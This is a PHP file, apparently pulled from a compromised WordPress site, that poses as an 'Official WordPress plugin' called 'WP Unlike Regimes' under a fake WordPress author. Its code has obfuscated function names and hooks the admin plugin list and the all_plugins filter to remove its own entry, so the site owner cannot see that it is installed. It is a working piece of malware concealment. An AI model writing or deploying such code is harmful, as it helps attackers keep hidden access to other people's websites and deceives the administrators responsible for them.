File: //proc/self/cwd/wp-content/plugins/wp-unlike-regimes/wp-unlike-regimes.php
<?php
/*
Plugin Name: WP Unlike Regimes
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 14.9.7
Author URI: http://wordpress.org/#
License: GPL2
*/
function jxp_qke()
{
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$x = array('wp-unlike-regimes/wp-unlike-regimes.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $x)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function xcn_yci($plugins)
{
$e = 'wp-unlike-regimes/wp-unlike-regimes.php';
if (array_key_exists($e, $plugins)) {
unset($plugins[$e]);
}
return $plugins;
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'jxp_qke');
add_filter('all_plugins', 'xcn_yci');
}